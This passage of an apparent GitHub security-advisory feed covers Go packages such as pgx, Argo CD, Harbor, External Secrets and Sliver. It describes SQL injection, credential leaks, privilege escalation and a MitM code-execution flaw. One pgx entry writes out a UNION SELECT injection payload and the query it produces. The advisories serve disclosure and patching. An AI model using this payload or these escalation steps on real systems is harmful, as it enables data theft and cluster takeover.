<li><a href="https://github.com/jackc/pgproto3/commit/945c2126f6db8f3bea7eeebe307c01fe92bca007">https://github.com/jackc/pgproto3/commit/945c2126f6db8f3bea7eeebe307c01fe92bca007</a></li>
<li><a href="https://github.com/jackc/pgx/commit/adbb38f298c76e283ffc7c7a3f571036fea47fd4">https://github.com/jackc/pgx/commit/adbb38f298c76e283ffc7c7a3f571036fea47fd4</a></li>
<li><a href="https://github.com/jackc/pgx/commit/c543134753a0c5d22881c12404025724cb05ffd8">https://github.com/jackc/pgx/commit/c543134753a0c5d22881c12404025724cb05ffd8</a></li>
<li><a href="https://github.com/jackc/pgx/commit/f94eb0e2f96782042c96801b5ac448f44f0a81df">https://github.com/jackc/pgx/commit/f94eb0e2f96782042c96801b5ac448f44f0a81df</a></li>
<li><a href="https://github.com/advisories/GHSA-mrww-27vc-gghv">https://github.com/advisories/GHSA-mrww-27vc-gghv</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-mrww-27vc-gghv</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-mrww-27vc-gghv</guid>
<author>GitHub</author>
</item>
<item>
<title>[github.com/jackc/pgx/v4] pgx SQL Injection via Protocol Message Size Overflow</title>
<description><h3 id="impact">Impact</h3>
<p>SQL injection can occur if an attacker can cause a single query or bind message to exceed 4 GB in size. An integer overflow in the calculated message size can cause the one large message to be sent as multiple messages under the attacker's control.</p>
<h3 id="patches">Patches</h3>
<p>The problem is resolved in v4.18.2 and v5.5.4.</p>
<h3 id="workarounds">Workarounds</h3>
<p>Reject user input large enough to cause a single query or bind message to exceed 4 GB in size.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/jackc/pgproto3/security/advisories/GHSA-7jwh-3vrq-q3m8">https://github.com/jackc/pgproto3/security/advisories/GHSA-7jwh-3vrq-q3m8</a></li>
<li><a href="https://github.com/jackc/pgx/security/advisories/GHSA-mrww-27vc-gghv">https://github.com/jackc/pgx/security/advisories/GHSA-mrww-27vc-gghv</a></li>
<li><a href="https://github.com/jackc/pgproto3/commit/945c2126f6db8f3bea7eeebe307c01fe92bca007">https://github.com/jackc/pgproto3/commit/945c2126f6db8f3bea7eeebe307c01fe92bca007</a></li>
<li><a href="https://github.com/jackc/pgx/commit/adbb38f298c76e283ffc7c7a3f571036fea47fd4">https://github.com/jackc/pgx/commit/adbb38f298c76e283ffc7c7a3f571036fea47fd4</a></li>
<li><a href="https://github.com/jackc/pgx/commit/c543134753a0c5d22881c12404025724cb05ffd8">https://github.com/jackc/pgx/commit/c543134753a0c5d22881c12404025724cb05ffd8</a></li>
<li><a href="https://github.com/jackc/pgx/commit/f94eb0e2f96782042c96801b5ac448f44f0a81df">https://github.com/jackc/pgx/commit/f94eb0e2f96782042c96801b5ac448f44f0a81df</a></li>
<li><a href="https://github.com/advisories/GHSA-mrww-27vc-gghv">https://github.com/advisories/GHSA-mrww-27vc-gghv</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-mrww-27vc-gghv</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-mrww-27vc-gghv</guid>
<author>GitHub</author>
</item>
<item>
<title>[github.com/jackc/pgx/v4] pgx SQL Injection via Line Comment Creation</title>
<description><h3 id="impact">Impact</h3>
<p>SQL injection can occur when all of the following conditions are met:</p>
<ol>
<li>The non-default simple protocol is used.</li>
<li>A placeholder for a numeric value must be immediately preceded by a minus.</li>
<li>There must be a second placeholder for a string value after the first placeholder; both
must be on the same line.</li>
<li>Both parameter values must be user-controlled.</li>
</ol>
<p>e.g. </p>
<p>Simple mode must be enabled:</p>
<pre><code class="language-go">// connection string includes "prefer_simple_protocol=true"
// or
// directly enabled in code
config.ConnConfig.PreferSimpleProtocol = true
</code></pre>
<p>Parameterized query:</p>
<pre><code class="language-sql">SELECT * FROM example WHERE result=-$1 OR name=$2;
</code></pre>
<p>Parameter values:</p>
<p><code>$1</code> =&gt; <code>-42</code>
<code>$2</code> =&gt; <code>"foo\n 1 AND 1=0 UNION SELECT * FROM secrets; --"</code></p>
<p>Resulting query after preparation:</p>
<pre><code class="language-sql">SELECT * FROM example WHERE result=--42 OR name= 'foo
1 AND 1=0 UNION SELECT * FROM secrets; --';
</code></pre>
<h3 id="patches">Patches</h3>
<p>The problem is resolved in v4.18.2.</p>
<h3 id="workarounds">Workarounds</h3>
<p>Do not use the simple protocol or do not place a minus directly before a placeholder.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/jackc/pgx/security/advisories/GHSA-m7wr-2xf7-cm9p">https://github.com/jackc/pgx/security/advisories/GHSA-m7wr-2xf7-cm9p</a></li>
<li><a href="https://github.com/jackc/pgx/commit/f94eb0e2f96782042c96801b5ac448f44f0a81df">https://github.com/jackc/pgx/commit/f94eb0e2f96782042c96801b5ac448f44f0a81df</a></li>
<li><a href="https://github.com/advisories/GHSA-m7wr-2xf7-cm9p">https://github.com/advisories/GHSA-m7wr-2xf7-cm9p</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-m7wr-2xf7-cm9p</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-m7wr-2xf7-cm9p</guid>
<author>GitHub</author>
</item>
<item>
<title>[github.com/argoproj/argo-cd/v2] Argo CD leaks repository credentials in user-facing error messages and in logs</title>
<description><h3 id="impact">Impact</h3>
<p>All versions of Argo CD starting with v2.6.0-rc1 have an output sanitization bug which leaks repository access credentials in error messages. These error messages are visible to the user, and they are logged. The error message is visible when a user attempts to create or update an Application via the Argo CD API (and therefore the UI or CLI). The user must have <code>applications, create</code> or <code>applications, update</code> RBAC access to reach the code which may produce the error.</p>
<p>The user is not guaranteed to be able to trigger the error message. They may attempt to spam the API with requests to trigger a rate limit error from the upstream repository. </p>
<p>If the user has <code>repositories, update</code> access, they may edit an existing repository to introduce a URL typo or otherwise force an error message. But if they have that level of access, they are probably intended to have access to the credentials anyway.</p>
<h3 id="patches">Patches</h3>
<p>A patch for this vulnerability has been released in the following Argo CD version:</p>
<ul>
<li>v2.6.1</li>
</ul>
<h3 id="workarounds">Workarounds</h3>
<p>The only way to completely resolve the issue is to upgrade.</p>
<h4 id="mitigations">Mitigations</h4>
<p>To mitigate the issue, make sure that your repo credentials have only least necessary privileges. For example, the credentials should not have push access, and they should not have access to more resources than what Argo CD actually needs (for example, a whole GitHub org when only one repo is needed).</p>
<p>To further mitigate the impact of a leaked write-capable repo credential, you could <a href="https://argo-cd.readthedocs.io/en/stable/user-guide/gpg-verification/#enforcing-signature-verification">enable commit signature verification</a>. Even if someone could push a malicious commit, the commit would not be synced.</p>
<p>You should also enforce least privileges in Argo CD RBAC. Make sure users only have <code>repositories, update</code>, <code>applications, update</code>, or <code>applications, create</code> access if they absolutely need it.</p>
<h3 id="references">References</h3>
<ul>
<li>The problem was initially reported in a <a href="https://github.com/argoproj/argo-cd/issues/12309">GitHub issue</a></li>
<li><a href="https://argo-cd.readthedocs.io/en/stable/operator-manual/rbac/">Argo CD RBAC configuration documentation</a></li>
</ul>
<h3 id="for-more-information">For more information</h3>
<ul>
<li>Open an issue in <a href="https://github.com/argoproj/argo-cd/issues">the Argo CD issue tracker</a> or <a href="https://github.com/argoproj/argo-cd/discussions">discussions</a></li>
<li>Join us on <a href="https://argoproj.github.io/community/join-slack">Slack</a> in channel #argo-cd</li>
</ul>
<h3 id="references-1">References</h3>
<ul>
<li><a href="https://github.com/argoproj/argo-cd/security/advisories/GHSA-mv6w-j4xc-qpfw">https://github.com/argoproj/argo-cd/security/advisories/GHSA-mv6w-j4xc-qpfw</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2023-25163">https://nvd.nist.gov/vuln/detail/CVE-2023-25163</a></li>
<li><a href="https://github.com/argoproj/argo-cd/issues/12309">https://github.com/argoproj/argo-cd/issues/12309</a></li>
<li><a href="https://github.com/argoproj/argo-cd/pull/12320">https://github.com/argoproj/argo-cd/pull/12320</a></li>
<li><a href="https://pkg.go.dev/vuln/GO-2023-1548">https://pkg.go.dev/vuln/GO-2023-1548</a></li>
<li><a href="https://argo-cd.readthedocs.io/en/stable/operator-manual/rbac">https://argo-cd.readthedocs.io/en/stable/operator-manual/rbac</a></li>
<li><a href="https://github.com/advisories/GHSA-mv6w-j4xc-qpfw">https://github.com/advisories/GHSA-mv6w-j4xc-qpfw</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-mv6w-j4xc-qpfw</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-mv6w-j4xc-qpfw</guid>
<author>GitHub</author>
</item>
<item>
<title>[github.com/gouniverse/cms] Gouniverse GoLang CMS vulnerable to Cross-site Scripting</title>
<description><p>A vulnerability was found in Gouniverse GoLang CMS 1.4.0. It has been declared as problematic. This vulnerability affects the function PageRenderHtmlByAlias of the file FrontendHandler.go. The manipulation of the argument alias leads to cross site scripting. The attack can be initiated remotely. Upgrading to version 1.4.1 is able to address this issue. The patch is identified as 3e661cdfb4beeb9fe2ad507cdb8104c0b17d072c. It is recommended to upgrade the affected component.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-8572">https://nvd.nist.gov/vuln/detail/CVE-2024-8572</a></li>
<li><a href="https://github.com/gouniverse/cms/issues/5">https://github.com/gouniverse/cms/issues/5</a></li>
<li><a href="https://github.com/gouniverse/cms/issues/5#issuecomment-2330848731">https://github.com/gouniverse/cms/issues/5#issuecomment-2330848731</a></li>
<li><a href="https://github.com/gouniverse/cms/commit/3e661cdfb4beeb9fe2ad507cdb8104c0b17d072c">https://github.com/gouniverse/cms/commit/3e661cdfb4beeb9fe2ad507cdb8104c0b17d072c</a></li>
<li><a href="https://github.com/gouniverse/cms/releases/tag/v1.4.1">https://github.com/gouniverse/cms/releases/tag/v1.4.1</a></li>
<li><a href="https://vuldb.com/?ctiid.276802">https://vuldb.com/?ctiid.276802</a></li>
<li><a href="https://vuldb.com/?id.276802">https://vuldb.com/?id.276802</a></li>
<li><a href="https://vuldb.com/?submit.401896">https://vuldb.com/?submit.401896</a></li>
<li><a href="https://github.com/advisories/GHSA-pv7h-hg6m-82j8">https://github.com/advisories/GHSA-pv7h-hg6m-82j8</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-pv7h-hg6m-82j8</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-pv7h-hg6m-82j8</guid>
<author>GitHub</author>
</item>
<item>
<title>[github.com/external-secrets/external-secrets] External Secrets Operator vulnerable to privilege escalation</title>
<description><h3 id="details">Details</h3>
<p>The external-secrets has a deployment called default-external-secrets-cert-controller, which is bound with a same-name ClusterRole. This ClusterRole has "get/list" verbs of secrets resources (<a href="https://github.com/external-secrets/external-secrets/blob/main/deploy/charts/external-secrets/templates/cert-controller-rbac.yaml#L49">https://github.com/external-secrets/external-secrets/blob/main/deploy/charts/external-secrets/templates/cert-controller-rbac.yaml#L49</a>). It also has patch/update verbs of validatingwebhookconfigurations resources (<a href="https://github.com/external-secrets/external-secrets/blob/main/deploy/charts/external-secrets/templates/cert-controller-rbac.yaml#L27">https://github.com/external-secrets/external-secrets/blob/main/deploy/charts/external-secrets/templates/cert-controller-rbac.yaml#L27</a>). As a result, if a malicious user can access the worker node which has this deployment, he/she can:</p>
<ol>
<li><p>For the "get/list secrets" permission, he/she can abuse the SA token of this deployment to retrieve or get ALL secrets in the whole cluster, including the cluster-admin secret if created. After that, he/she can abuse the cluster-admin secret to do whatever he/she likes to the whole cluster, resulting in a cluster-level privilege escalation.</p>
</li>
<li><p>For the patch/update verb of validatingwebhookconfigurations, the malicious user can abuse these permissions to get sensitive data or launch DoS attacks:</p>
</li>
</ol>
<p>For the privilege escalation attack, by updating/patching a Webhook to make it listen to Secret update operations, the attacker can capture and log all data from requests attempting to update Secrets. More specifically, when a Secret is updated, this Webhook sends the request data to the logging-service, which can then log the content of the Secret. This way, an attacker could indirectly gain access to the full contents of the Secret.</p>
<p>For the DoS attack, by updating/patching a Webhook, and making it deny all Pod create and update requests, the attacker can prevent any new Pods from being created or existing Pods from being updated, resulting in a Denial of Service (DoS) attack.</p>
<h3 id="poc">PoC</h3>
<p>Please see the "Details" section</p>
<h3 id="impact">Impact</h3>
<p>Privilege escalation</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/external-secrets/external-secrets/security/advisories/GHSA-qwgc-rr35-h4x9">https://github.com/external-secrets/external-secrets/security/advisories/GHSA-qwgc-rr35-h4x9</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-45041">https://nvd.nist.gov/vuln/detail/CVE-2024-45041</a></li>
<li><a href="https://github.com/external-secrets/external-secrets/commit/0368b9806f660fa6bc52cbbf3c6ccdb27c58bb35">https://github.com/external-secrets/external-secrets/commit/0368b9806f660fa6bc52cbbf3c6ccdb27c58bb35</a></li>
<li><a href="https://github.com/external-secrets/external-secrets/commit/428a452fd2ad45935312f2c2c0d40bc37ce6e67c">https://github.com/external-secrets/external-secrets/commit/428a452fd2ad45935312f2c2c0d40bc37ce6e67c</a></li>
<li><a href="https://github.com/external-secrets/external-secrets/blob/main/deploy/charts/external-secrets/templates/cert-controller-rbac.yaml#L27">https://github.com/external-secrets/external-secrets/blob/main/deploy/charts/external-secrets/templates/cert-controller-rbac.yaml#L27</a></li>
<li><a href="https://github.com/external-secrets/external-secrets/blob/main/deploy/charts/external-secrets/templates/cert-controller-rbac.yaml#L49">https://github.com/external-secrets/external-secrets/blob/main/deploy/charts/external-secrets/templates/cert-controller-rbac.yaml#L49</a></li>
<li><a href="https://github.com/advisories/GHSA-qwgc-rr35-h4x9">https://github.com/advisories/GHSA-qwgc-rr35-h4x9</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-qwgc-rr35-h4x9</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-qwgc-rr35-h4x9</guid>
<author>GitHub</author>
</item>
<item>
<title>[github.com/bishopfox/sliver] Sliver vulnerable to MitM attack against implants due to a cryptography vulnerability</title>
<description><h3 id="summary">Summary</h3>
<p>The current cryptography implementation in Sliver up to version 1.5.39 allows a MitM with access to the corresponding implant binary to execute arbitrary code on implanted devices via intercepted and crafted responses. (Reserved CVE ID: CVE-2023-34758)</p>
<h3 id="details">Details</h3>
<p>Please see <a href="https://github.com/tangent65536/Slivjacker">the PoC repo</a>.</p>
<h3 id="poc">PoC</h3>
<p>Please also see <a href="https://github.com/tangent65536/Slivjacker">the PoC repo</a>.
To set up a simple PoC environment:</p>
<ol>
<li>Generate an implant with its C2 set to the PoC server's address and copy the embedded private implant key and public server key into the config json. </li>
<li>Run the implant on a separate VM and a <code>notepad.exe</code> window should pop up on the implanted VM.</li>
</ol>
<h3 id="impact">Impact</h3>
<p>A successful attack grants the attacker permission to execute arbitrary code on the implanted device. </p>
<h3 id="references">References</h3>
<p><a href="https://github.com/BishopFox/sliver/blob/master/implant/sliver/cryptography/implant.go">https://github.com/BishopFox/sliver/blob/master/implant/sliver/cryptography/implant.go</a><br><a href="https://github.com/BishopFox/sliver/blob/master/implant/sliver/cryptography/crypto.go">https://github.com/BishopFox/sliver/blob/master/implant/sliver/cryptography/crypto.go</a><br><a href="https://github.com/tangent65536/Slivjacker">https://github.com/tangent65536/Slivjacker</a> </p>
<h3 id="credits">Credits</h3>
<p><a href="https://github.com/tangent65536">Ting-Wei Hsieh</a> from <a href="https://www.chtsecurity.com/?lang=en">CHT Security Co. Ltd.</a></p>
<h3 id="references-1">References</h3>
<ul>
<li><a href="https://github.com/BishopFox/sliver/security/advisories/GHSA-8jxm-xp43-qh3q">https://github.com/BishopFox/sliver/security/advisories/GHSA-8jxm-xp43-qh3q</a></li>
<li><a href="https://github.com/BishopFox/sliver/commit/2d1ea6192cac2ff9d6450b2d96043fdbf8561516">https://github.com/BishopFox/sliver/commit/2d1ea6192cac2ff9d6450b2d96043fdbf8561516</a></li>
<li><a href="https://github.com/BishopFox/sliver/blob/master/implant/sliver/cryptography/crypto.go">https://github.com/BishopFox/sliver/blob/master/implant/sliver/cryptography/crypto.go</a></li>
<li><a href="https://github.com/BishopFox/sliver/blob/master/implant/sliver/cryptography/implant.go">https://github.com/BishopFox/sliver/blob/master/implant/sliver/cryptography/implant.go</a></li>
<li><a href="https://github.com/BishopFox/sliver/releases/tag/v1.5.40">https://github.com/BishopFox/sliver/releases/tag/v1.5.40</a></li>
<li><a href="https://github.com/tangent65536/Slivjacker">https://github.com/tangent65536/Slivjacker</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2023-35170">https://nvd.nist.gov/vuln/detail/CVE-2023-35170</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2023-34758">https://nvd.nist.gov/vuln/detail/CVE-2023-34758</a></li>
<li><a href="https://www.chtsecurity.com/news/04f41dcc-1851-463c-93bc-551323ad8091">https://www.chtsecurity.com/news/04f41dcc-1851-463c-93bc-551323ad8091</a></li>
<li><a href="https://pkg.go.dev/vuln/GO-2023-1866">https://pkg.go.dev/vuln/GO-2023-1866</a></li>
<li><a href="https://github.com/advisories/GHSA-8jxm-xp43-qh3q">https://github.com/advisories/GHSA-8jxm-xp43-qh3q</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-8jxm-xp43-qh3q</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-8jxm-xp43-qh3q</guid>
<author>GitHub</author>
</item>
<item>
<title>[github.com/osrg/gobgp/v3] Buffer Overflow vulnerability in osrg gobgp</title>
<description><p>Buffer Overflow vulnerability in osrg gobgp commit 419c50dfac578daa4d11256904d0dc182f1a9b22 allows a remote attacker to cause a denial of service via the handlingError function in pkg/server/fsm.go.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2023-46565">https://nvd.nist.gov/vuln/detail/CVE-2023-46565</a></li>
<li><a href="https://github.com/osrg/gobgp/issues/2725">https://github.com/osrg/gobgp/issues/2725</a></li>
<li><a href="https://github.com/osrg/gobgp/commit/419c50dfac578daa4d11256904d0dc182f1a9b22">https://github.com/osrg/gobgp/commit/419c50dfac578daa4d11256904d0dc182f1a9b22</a></li>
<li><a href="https://github.com/advisories/GHSA-6rqv-5cg7-m4x3">https://github.com/advisories/GHSA-6rqv-5cg7-m4x3</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-6rqv-5cg7-m4x3</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-6rqv-5cg7-m4x3</guid>
<author>GitHub</author>
</item>
<item>
<title>[github.com/gitpod-io/gitpod] github.com/gitpod-io/gitpod vulnerable to Cookie Tossing</title>
<description><p>Versions of the package github.com/gitpod-io/gitpod/components/server/go/pkg/lib before main-gha.27122; versions of the package github.com/gitpod-io/gitpod/components/ws-proxy/pkg/proxy before main-gha.27122; versions of the package github.com/gitpod-io/gitpod/install/installer/pkg/components/auth before main-gha.27122; versions of the package github.com/gitpod-io/gitpod/install/installer/pkg/components/public-api-server before main-gha.27122; versions of the package github.com/gitpod-io/gitpod/install/installer/pkg/components/server before main-gha.27122; versions of the package @gitpod/gitpod-protocol before 0.1.5-main-gha.27122 are vulnerable to Cookie Tossing due to a missing __Host- prefix on the <em>gitpod_io_jwt2</em> session cookie. This allows an adversary who controls a subdomain to set the value of the cookie on the Gitpod control plane, which can be assigned to an attacker’s own JWT so that specific actions taken by the victim (such as connecting a new Github organization) are actioned by the attacker’s session.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-21583">https://nvd.nist.gov/vuln/detail/CVE-2024-21583</a></li>
<li><a href="https://github.com/gitpod-io/gitpod/pull/19973">https://github.com/gitpod-io/gitpod/pull/19973</a></li>
<li><a href="https://github.com/gitpod-io/gitpod/commit/da1053e1013f27a56e6d3533aa251dbd241d0155">https://github.com/gitpod-io/gitpod/commit/da1053e1013f27a56e6d3533aa251dbd241d0155</a></li>
<li><a href="https://app.safebase.io/portal/71ccd717-aa2d-4a1e-942e-c768d37e9e0c/preview?product=%5B%E2%80%A6%5D942e-c768d37e9e0c&amp;tcuUid=1d505bda-9a38-4ca5-8724-052e6337f34d">https://app.safebase.io/portal/71ccd717-aa2d-4a1e-942e-c768d37e9e0c/preview?product=%5B%E2%80%A6%5D942e-c768d37e9e0c&amp;tcuUid=1d505bda-9a38-4ca5-8724-052e6337f34d</a></li>
<li><a href="https://security.snyk.io/vuln/SNYK-GOLANG-GITHUBCOMGITPODIOGITPODCOMPONENTSSERVERGOPKGLIB-7452074">https://security.snyk.io/vuln/SNYK-GOLANG-GITHUBCOMGITPODIOGITPODCOMPONENTSSERVERGOPKGLIB-7452074</a></li>
<li><a href="https://security.snyk.io/vuln/SNYK-GOLANG-GITHUBCOMGITPODIOGITPODCOMPONENTSWSPROXYPKGPROXY-7452075">https://security.snyk.io/vuln/SNYK-GOLANG-GITHUBCOMGITPODIOGITPODCOMPONENTSWSPROXYPKGPROXY-7452075</a></li>
<li><a href="https://security.snyk.io/vuln/SNYK-GOLANG-GITHUBCOMGITPODIOGITPODINSTALLINSTALLERPKGCOMPONENTSAUTH-7452076">https://security.snyk.io/vuln/SNYK-GOLANG-GITHUBCOMGITPODIOGITPODINSTALLINSTALLERPKGCOMPONENTSAUTH-7452076</a></li>
<li><a href="https://security.snyk.io/vuln/SNYK-GOLANG-GITHUBCOMGITPODIOGITPODINSTALLINSTALLERPKGCOMPONENTSPUBLICAPISERVER-7452077">https://security.snyk.io/vuln/SNYK-GOLANG-GITHUBCOMGITPODIOGITPODINSTALLINSTALLERPKGCOMPONENTSPUBLICAPISERVER-7452077</a></li>
<li><a href="https://security.snyk.io/vuln/SNYK-GOLANG-GITHUBCOMGITPODIOGITPODINSTALLINSTALLERPKGCOMPONENTSSERVER-7452078">https://security.snyk.io/vuln/SNYK-GOLANG-GITHUBCOMGITPODIOGITPODINSTALLINSTALLERPKGCOMPONENTSSERVER-7452078</a></li>
<li><a href="https://security.snyk.io/vuln/SNYK-JS-GITPODGITPODPROTOCOL-7452079">https://security.snyk.io/vuln/SNYK-JS-GITPODGITPODPROTOCOL-7452079</a></li>
<li><a href="https://pkg.go.dev/vuln/GO-2024-2997">https://pkg.go.dev/vuln/GO-2024-2997</a></li>
<li><a href="https://github.com/advisories/GHSA-8pgc-65mj-53h5">https://github.com/advisories/GHSA-8pgc-65mj-53h5</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-8pgc-65mj-53h5</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-8pgc-65mj-53h5</guid>
<author>GitHub</author>
</item>
<item>
<title>[github.com/windmill-labs/windmill] Windmill HTTP Request users.rs excessive authentication in github.com/windmill-labs/windmill</title>
<description><p>A vulnerability was found in Windmill 1.380.0. It has been classified as problematic. Affected is an unknown function of the file backend/windmill-api/src/users.rs of the component HTTP Request Handler. The manipulation leads to improper restriction of excessive authentication attempts. It is possible to launch the attack remotely. The complexity of an attack is rather high. The exploitability is told to be difficult. Upgrading to version 1.390.1 is able to address this issue. The patch is identified as acfe7786152f036f2476f93ab5536571514fa9e3. It is recommended to upgrade the affected component.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-8462">https://nvd.nist.gov/vuln/detail/CVE-2024-8462</a></li>
<li><a href="https://github.com/windmill-labs/windmill/commit/acfe7786152f036f2476f93ab5536571514fa9e3">https://github.com/windmill-labs/windmill/commit/acfe7786152f036f2476f93ab5536571514fa9e3</a></li>
<li><a href="https://github.com/windmill-labs/windmill/releases/tag/v1.390.1">https://github.com/windmill-labs/windmill/releases/tag/v1.390.1</a></li>
<li><a href="https://vuldb.com/?ctiid.276630">https://vuldb.com/?ctiid.276630</a></li>
<li><a href="https://vuldb.com/?id.276630">https://vuldb.com/?id.276630</a></li>
<li><a href="https://vuldb.com/?submit.401826">https://vuldb.com/?submit.401826</a></li>
<li><a href="https://pkg.go.dev/vuln/GO-2024-3118">https://pkg.go.dev/vuln/GO-2024-3118</a></li>
<li><a href="https://github.com/advisories/GHSA-g6q4-w3j3-jfc4">https://github.com/advisories/GHSA-g6q4-w3j3-jfc4</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-g6q4-w3j3-jfc4</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-g6q4-w3j3-jfc4</guid>
<author>GitHub</author>
</item>
<item>
<title>[github.com/goharbor/harbor] Cross-site Request Forgery (CSRF) in Cloud Native Computing Foundation Harbor</title>
<description><p>Cure53 has discovered that the Harbor web interface does not implement protection mechanisms against Cross-Site Request Forgery (CSRF). By luring an authenticated user onto a prepared third-party website, an attacker can execute any action on the platform in the context of the currently authenticated victim.</p>
<p>The vulnerability was immediately fixed by the Harbor team and all supported versions were patched.</p>
<p>Successful exploitation of this issue will lead to 3rd parties executing actions on the platform on behalf of authenticated users and administrators.</p>
<p>If your product uses the affected releases of Harbor, update to version 1.8.6 and 1.9.3 to patch this issue immediately.</p>
<p><a href="https://github.com/goharbor/harbor/releases/tag/v1.8.6">https://github.com/goharbor/harbor/releases/tag/v1.8.6</a>
<a href="https://github.com/goharbor/harbor/releases/tag/v1.9.3">https://github.com/goharbor/harbor/releases/tag/v1.9.3</a></p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/goharbor/harbor/security/advisories/GHSA-gcqm-v682-ccw6">https://github.com/goharbor/harbor/security/advisories/GHSA-gcqm-v682-ccw6</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2019-19025">https://nvd.nist.gov/vuln/detail/CVE-2019-19025</a></li>
<li><a href="https://github.com/goharbor/harbor/security/advisories">https://github.com/goharbor/harbor/security/advisories</a></li>
<li><a href="https://tanzu.vmware.com/security/cve-2019-19025">https://tanzu.vmware.com/security/cve-2019-19025</a></li>
<li><a href="https://github.com/advisories/GHSA-rffr-c932-cpxv">https://github.com/advisories/GHSA-rffr-c932-cpxv</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-rffr-c932-cpxv</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-rffr-c932-cpxv</guid>
<author>GitHub</author>
</item>
<item>
<title>[github.com/goharbor/harbor] SQL Injection in Cloud Native Computing Foundation Harbor</title>
<description><p>Cloud Native Computing Foundation Harbor prior to 1.8.6 and 1.9.3 allows SQL Injection via user-groups in the VMware Harbor Container Registry for the Pivotal Platform.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/goharbor/harbor/security/advisories/GHSA-qcfv-8v29-469w">https://github.com/goharbor/harbor/security/advisories/GHSA-qcfv-8v29-469w</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2019-19029">https://nvd.nist.gov/vuln/detail/CVE-2019-19029</a></li>
<li><a href="https://github.com/goharbor/harbor/security/advisories">https://github.com/goharbor/harbor/security/advisories</a></li>
<li><a href="https://tanzu.vmware.com/security/cve-2019-19029">https://tanzu.vmware.com/security/cve-2019-19029</a></li>
<li><a href="https://pkg.go.dev/vuln/GO-2022-0853">https://pkg.go.dev/vuln/GO-2022-0853</a></li>
<li><a href="https://github.com/advisories/GHSA-jr34-mff8-pc6f">https://github.com/advisories/GHSA-jr34-mff8-pc6f</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-jr34-mff8-pc6f</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-jr34-mff8-pc6f</guid>
<author>GitHub</author>
</item>
<item>
<title>[github.com/cosmos/interchain-security/v4] Interchain Security: The signers of ICS messages do not need to match the provider address</title>
<description><h3 id="context">Context</h3>
<p>ICS has the following four messages that enable validators on the provider chain to perform different actions:</p>
<ul>
<li><code>MsgOptIn</code> -- adds a validator to the consumer chain’s active set</li>
<li><code>MsgOptOut</code> -- removes a validator from the consumer chain’s active set </li>
<li><code>MsgAssignConsumerKey</code> -- changes the consensus key used for a validator’s operations on a consumer chain</li>
<li><code>MsgSetConsumerCommissionRate</code> -- sets a validator’s consumer-specific commission rate</li>
</ul>
<p>Normally, only the respective validators are allowed to perform these actions. </p>
<h3 id="issue">Issue</h3>
<p>The upgrade to SDK 0.50 introduced a <a href="https://docs.cosmos.network/v0.50/build/building-modules/protobuf-annotations#signer">signer</a> field to these messages. This field is used to authenticate the user sending the message to the system. However, there was no validation on the ICS side to check if the signer matches the provider address. </p>
<p>As a result, any user could opt-in, opt-out, change the commission rate, or change what public key a validator uses on a consumer chain. </p>
<p>For more context, check out the code:</p>
<ul>
<li>proto files <a href="https://github.com/cosmos/interchain-security/blob/v5.1.1/proto/interchain_security/ccv/provider/v1/tx.proto#L52">https://github.com/cosmos/interchain-security/blob/v5.1.1/proto/interchain_security/ccv/provider/v1/tx.proto#L52</a></li>
<li>message validation <a href="https://github.com/cosmos/interchain-security/blob/v5.1.1/x/ccv/provider/types/msg.go#L106">https://github.com/cosmos/interchain-security/blob/v5.1.1/x/ccv/provider/types/msg.go#L106</a></li>
<li>message handling <a href="https://github.com/cosmos/interchain-security/blob/v5.1.1/x/ccv/provider/keeper/msg_server.go#L52">https://github.com/cosmos/interchain-security/blob/v5.1.1/x/ccv/provider/keeper/msg_server.go#L52</a></li>
</ul>
<h3 id="severity-assessment">Severity assessment</h3>
<p>The severity assessment is based on <a href="https://github.com/interchainio/security/blob/main/resources/CLASSIFICATION_MATRIX.md">this framework</a>. </p>
<p><strong>Potential impact:</strong> Catastrophic </p>
<ul>
<li>By changing consumer keys for 1/3+ of a consumer chain's validator set, any user could cause a consumer chain to halt. Given that the consumer is down, the provider will jail provider validators for consumer downtime, so this exploit would not have impacted the provider directly. Consumer chain halts would need to be addressed by a provider-side patch.</li>
